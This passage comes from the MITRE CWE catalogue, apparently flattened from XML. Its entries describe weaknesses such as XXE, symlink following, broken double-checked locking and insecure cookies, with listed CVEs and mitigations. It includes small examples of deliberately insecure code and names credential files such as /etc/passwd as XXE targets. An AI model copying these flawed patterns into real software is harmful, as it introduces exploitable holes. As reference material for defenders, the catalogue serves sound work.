- - - - - - - Implementation - - - - - Integrity - Other - Modify Application Data - Alter Execution Logic - - - - - Implementation - While double-checked locking can be achieved in some languages, it is inherently flawed in Java before 1.5, and cannot be achieved without compromising platform independence. Before Java 1.5, only use of the synchronized keyword is known to work. Beginning in Java 1.5, use of the "volatile" keyword allows double-checked locking to work successfully, although there is some debate as to whether it achieves sufficient performance gains. See references. - - - - - It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization... - - if (helper == null) { - synchronized (this) {if (helper == null) {helper = new Helper();}} - }return helper; - - The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called. - Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute: - - helper = new Helper(); - - If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values. - - - - - LCK10-J - Do not use incorrect forms of the double-checked locking idiom - - - SFP19 - Missing Lock - - - - - - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Context_Notes - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Double Checked Locking - - - - The software, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files. - A software system that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to access. - - - - - - - - - - Resultant - - - - - - - - Symlink following - - - symlink vulnerability - - - - - Implementation - These are typically reported for temporary files or privileged programs. - - - High - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Symbolic link attacks often occur when a program creates a tmp directory that stores files/links. Access to the directory should be restricted to the program as to prevent attackers from manipulating the files. - - - Architecture and Design - Separation of Privilege - - Follow the principle of least privilege when assigning access rights to entities in a software system. - Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. - - - - - - CVE-1999-1386 - Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386 - - - CVE-2000-1178 - Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178 - - - CVE-2004-0217 - Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217 - - - CVE-2003-0517 - Symlink attack allows local users to overwrite files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517 - - - CVE-2004-0689 - Possible interesting example - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689 - - - CVE-2005-1879 - Second-order symlink vulnerabilities - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879 - - - CVE-2005-1880 - Second-order symlink vulnerabilities - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880 - - - CVE-2005-1916 - Symlink in Python program - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916 - - - CVE-2000-0972 - Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972 - - - CVE-2005-0824 - Signal causes a dump that follows symlinks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824 - - - - - UNIX symbolic link following - - - - - - - - - - - - - Symlink vulnerabilities are regularly found in C and shell programs, but all programming languages can have this problem. Even shell programs are probably under-reported. - "Second-order symlink vulnerabilities" may exist in programs that invoke other programs that follow symlinks. They are rarely reported but are likely to be fairly common when process invocation is used. Reference: [Christey2005] - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere. - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - - - This is a general class of weakness, but most research is focused on more specialized cases, such as path traversal (CWE-22) and symlink following (CWE-61). A symbolic link has a name; in general, it appears like any other file in the file system. However, the link includes a reference to another file, often in another directory - perhaps in another sphere of control. Many common library functions that accept filenames will "follow" a symbolic link and use the link's target instead. - The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer. - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Externally Controlled Reference to an Internal Resource - - - - The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. - - XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing. - By submitting an XML file that defines an external entity with a file:// URI, an attacker can cause the processing application to read the contents of a local file. For example, a URI such as "file:///c:/winnt/win.ini" designates (in Windows) the file C:\Winnt\win.ini, or file:///etc/passwd designates the password file in Unix-based systems. Using URIs with other schemes such as http://, the attacker can force the application to make outgoing requests to servers that the attacker cannot reach directly, which can be used to bypass firewall restrictions or hide the source of attacks such as port scanning. - Once the content of the URI is read, it is fed back into the application that is processing the XML. This application may echo back the data (e.g. in an error message), thereby exposing the file contents. - - - - - - - - - - - - - XXE - XXE is an acronym used for the term "XML eXternal Entities" - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Read Application Data - Read Files or Directories - If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system. - - - Integrity - Bypass Protection Mechanism - The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server's trust relationship with other entities. - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - The software could consume excessive CPU cycles or memory using a URI that points to a large file, or a device that always returns data such as /dev/random. Alternately, the URI could reference a file that contains many nested or recursive entity references to further slow down parsing. - - - - - Implementation - System Configuration - Many XML parsers and validators can be configured to disable external entity expansion. - - - - - CVE-2005-1306 - A browser control can allow remote attackers to determine the existence of files via Javascript containing XML script. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1306 - - - CVE-2012-5656 - XXE during SVG image conversion - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5656 - - - CVE-2012-2239 - XXE in PHP application allows reading the application's configuration file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2239 - - - CVE-2012-3489 - XXE in database server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489 - - - CVE-2012-4399 - XXE in rapid web application development framework allows reading arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4399 - - - CVE-2012-3363 - XXE via XML-RPC request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3363 - - - CVE-2012-0037 - XXE in office document product using RDF. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0037 - - - CVE-2011-4107 - XXE in web-based administration tool for database. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4107 - - - CVE-2010-3322 - XXE in product that performs large-scale data analysis. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3322 - - - CVE-2009-1699 - XXE in XSL stylesheet functionality in a common library used by some web browsers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1699 - - - - - 43 - XML External Entities - - - SFP24 - Tainted input to command - - - - - - - - - - - - - - - CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the "Server" portion of the SSRF acronym does not necessarily apply. - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Background_Details, Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Name, Type - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Information Leak Through XML External Entity File Disclosure - Information Exposure Through XML External Entity Reference - Improper Restriction of XML External Entity Reference ('XXE') - - - - The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information. - Web sites and other document repositories may apply an indexing routine against a group of private documents to facilitate search. If the index's results are available to parties who do not have access to the documents being indexed, then attackers could obtain portions of the documents by conducting targeted searches and reading the results. The risk is especially dangerous if search results include surrounding text that was not part of the search query. This issue can appear in search engines that are not configured (or implemented) to ignore critical files that should remain hidden; even without permissions to download these files directly, the remote user could read them. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - 48 - Insecure Indexing - - - - - - - This weakness is probably under-studied and under-reported - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, References, Relationships, Type - - Information Leak Through Insecure Indexing - Information Leak Through Indexing of Private Data - Information Exposure Through Indexing of Private Data - - - - According to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization." - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - Set sessions/credentials expiration date. - - - - - The following snippet was taken from a J2EE web.xml deployment descriptor in which the session-timeout parameter is explicitly defined (the default value depends on the container). In this case the value is set to -1, which means that a session will never expire. - - <web-app> - [...snipped...] - <session-config><session-timeout>-1</session-timeout></session-config> - </web-app> - - - - - - 47 - Insufficient Session Expiration - - - - The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a web site from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim. - - - - WASC - 2007-05-07 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session. - - - - - - - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Implementation - Always set the secure attribute when the cookie should sent via HTTPS only. - - - - - The snippet of code below, taken from a servlet doPost() method, sets an accountID cookie (sensitive) without calling setSecure(true). - - Cookie c = new Cookie(ACCOUNT_ID, acctID);response.addCookie(c); - - - - - - CVE-2004-0462 - A product does not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session with the product. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0462 - - - CVE-2008-3663 - A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3663 - - - CVE-2008-3662 - A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3662 - - - CVE-2008-0128 - A product does not set the secure flag for a cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128 - - - - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-03-10 - updated Name - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - Unset Secure Attribute for Sensitive Cookies in HTTPS Session - - - - While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc. - An attacker who finds these comments can map the application's structure and files, expose hidden parts of the site, and study the fragments of code to reverse engineer the application, which may help develop further attacks against the site. - - - - - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Distribution - Remove comments which have sensitive information about the design/implementation of the application. Some of the comments may be exposed to the user and affect the security posture of the application. - - - - - The following comment, embedded in a JSP, will be displayed in the resulting HTML output. - - <!-- FIXME: calling this with more than 30 args kills the JDBC server --> - - - - - - CVE-2007-6197 - Version numbers and internal hostnames leaked in HTML comments. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6197 - - - CVE-2007-4072 - CMS places full pathname of server in HTML comment. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4072 - - - CVE-2009-2431 - blog software leaks real username in HTML comment. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2431 - - - - - Anonymous Tool Vendor (under NDA) - 2007-05-07 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Observed_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak Through Comments - Information Exposure Through Comments - - - - The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files. - These global variables could be overwritten by POST requests, cookies, or other methods of populating or overwriting these variables. This could be used to read or process arbitrary files by providing values such as "/etc/passwd". - - - - - - - Primary - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Architecture and Design - Use PHP 4 or later. - - - Architecture and Design - If you must support older PHP versions, write your own version of is_uploaded_file() and run it against $HTTP_POST_FILES['userfile'])) - - - Implementation - For later PHP versions, reference uploaded files using the $HTTP_POST_FILES or $_FILES variables, and use is_uploaded_file() or move_uploaded_file() to ensure that you are dealing with an uploaded file. - - - - - As of 2006, the "four globals" method is probably in sharp decline, but older PHP applications could have this issue. - In the "four globals" method, PHP sets the following 4 global variables (where "varname" is application-dependent): - - $varname = name of the temporary file on local machine$varname_size = size of file$varname_name = original name of file provided by client$varname_type = MIME type of the file - - - - "The global $_FILES exists as of PHP 4.1.0 (Use $HTTP_POST_FILES instead if using an earlier version). These arrays will contain all the uploaded file information." - - $_FILES['userfile']['name'] - original filename from client$_FILES['userfile']['tmp_name'] - the temp filename of the file on the server - - ** note: 'userfile' is the field name from the web form; this can vary. - - - - - CVE-2002-1460 - Forum does not properly verify whether a file was uploaded or if the associated variables were set by POST, allowing remote attackers to read arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1460 - - - CVE-2002-1759 - Product doesn't check if the variables for an upload were set by uploading the file, or other methods such as $_POST. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1759 - - - CVE-2002-1710 - Product does not distinguish uploaded file from other files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1710 - - - - - Incomplete Identification of Uploaded File Variables (PHP) - - - SFP25 - Tainted input to variable - - - - - - - - PLOVER - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary. - - While assertion is good for catching logic errors and reducing the chances of reaching more serious vulnerability conditions, it can still lead to a denial of service. - For example, if a server handles multiple simultaneous connections, and an assert() occurs in one single connection that causes all other connections to be dropped, this is a reachable assertion that leads to a denial of service. - - - - - - - - Resultant - - - - - assertion failure - - - - - Implementation - - - - - Availability - DoS: Crash, Exit, or Restart - An attacker that can trigger an assert statement can still lead to a denial of service if the relevant code can be triggered by an attacker, and if the scope of the assert() extends beyond the attacker's own session. - - - - - Implementation - Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources) - - - Implementation - Input Validation - Perform input validation on user data. - - - - - In the excerpt below, an AssertionError (an unchecked exception) is thrown if the user hasn't entered an email address in an HTML form. - - String email = request.getParameter("email_address");assert email != null; - - - - - - CVE-2006-6767 - FTP server allows remote attackers to cause a denial of service (daemon abort) via crafted commands which trigger an assertion failure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6767 - - - CVE-2006-6811 - Chat client allows remote attackers to cause a denial of service (crash) via a long message string when connecting to a server, which causes an assertion failure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6811 - - - CVE-2006-5779 - Product allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779 - - - CVE-2006-4095 - Product allows remote attackers to cause a denial of service (crash) via certain queries, which cause an assertion failure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4095 - - - CVE-2006-4574 - Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574 - - - - - MET01-J - Never use assertions to validate method arguments - - - SFP3 - Use of an improper API - - - - - CWE Content Team - MITRE - 2007-05-07 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Common_Consequences, Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2019-09-19 - updated Alternate_Terms - - - - - An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser's security model (e.g. the zone or domain). - ActiveX controls can exercise far greater control over the operating system than typical Java or javascript. Exposed methods can be subject to various vulnerabilities, depending on the implemented behaviors of those methods, and whether input validation is performed on the provided arguments. If there is no integrity checking or origin validation, this method could be invoked by attackers. - - - - - - Primary - - - - - Architecture and Design - - - Implementation - - - - - Other - Other - - - - - Implementation - If you must expose a method, make sure to perform input validation on all arguments, and protect against all possible vulnerabilities. - - - Architecture and Design - Use code signing, although this does not protect against any weaknesses that are already in the control. - - - Architecture and Design - System Configuration - Where possible, avoid marking the control as safe for scripting. - - - - - CVE-2007-1120 - download a file to arbitrary folders. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1120 - - - CVE-2006-6838 - control downloads and executes a url in a parameter - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6838 - - - CVE-2007-0321 - resultant buffer overflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0321 - - - - - - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Relationships - - - - - If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor "dangling." - For example, an improper dangling cursor could arise from unhandled exceptions. The impact of the issue depends on the cursor's role, but SQL injection attacks are commonly possible. - - - - - - Primary - This could be primary when the programmer never attempts to close the cursor when finished with it. - - - Resultant - - - - - - - A cursor is a feature in Oracle PL/SQL and other languages that provides a handle for executing and accessing the results of SQL queries. - - - - Implementation - This issue is currently reported for unhandled exceptions, but it is theoretically possible any time the programmer does not close the cursor at the proper time. - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - Implementation - Close cursors immediately after access to them is complete. Ensure that you close cursors if exceptions occur. - - - - - SFP24 - Tainted input to command - - - - - - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-10-14 - updated Background_Details, Description, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Modes_of_Introduction, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Dangling Database Cursor (Cursor Injection) - Dangling Database Cursor (aka 'Cursor Injection') - - - 